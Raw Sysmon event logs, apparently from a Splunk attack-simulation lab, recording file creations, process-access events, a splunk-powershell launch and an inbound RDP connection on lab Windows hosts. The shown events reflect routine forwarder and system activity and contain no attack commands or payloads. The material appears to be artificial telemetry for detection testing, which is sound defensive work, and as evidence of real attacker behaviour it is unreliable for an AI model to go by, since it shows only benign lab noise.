Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=96CE23F4B089DDB7269F614DC066271F,SHA256=B9CEDB7435425E6C215967EDF71FE38AB0AB0DBC409A88514B49AF2AFB72D009,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219374Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:46.349{4F8D34B0-F11D-6215-2300-000000003902}2036NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219373Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:46.068{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=69E4A8CA4374E687E6F901F941677351,SHA256=0EA082387E811EC8FB54D5804EE218AED66CC2792CC791F7AE29D38042058BFD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295249Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:46.772{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\datareporting\glean\db\data.safe.binMD5=3851108C73B0B567FB5BDD5AC124CEF5,SHA256=98C35312A18CDAF75A910DE1225234161D194A761EF6C48884C0BC2D2B0609C6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295252Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:47.825{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=71621842EA1A9333D165F3145DB20047,SHA256=42303C818E0BFE03446856F6A100BFE283EE41169403DE5CEA8895DAB6D3697C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000219403Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:47.880{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-150B-6216-C504-000000003902}524C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219402Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:47.880{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219401Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:47.880{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219400Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:47.880{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219399Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:47.880{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219398Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:47.880{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219397Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:47.880{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219396Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:47.880{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219395Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:47.880{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219394Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:47.880{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219393Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:47.880{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-150B-6216-C504-000000003902}524C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000219392Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:47.880{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-150B-6216-C504-000000003902}524C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000219391Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:47.881{4F8D34B0-150B-6216-C504-000000003902}524C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000219390Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:44.383{4F8D34B0-F11C-6215-1000-000000003902}940C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse187.141.52.101customer-187-141-52-101-sta.uninet-ide.com.mx52560-false10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal3389ms-wbt-server 10341000x8000000000000000219389Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:47.209{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-150B-6216-C404-000000003902}912C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219388Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:47.209{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219387Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:47.209{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219386Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:47.209{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219385Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:47.209{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219384Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:47.209{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219383Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:47.209{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219382Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:47.209{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219381Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:47.209{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219380Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:47.209{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219379Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:47.209{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-150B-6216-C404-000000003902}912C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 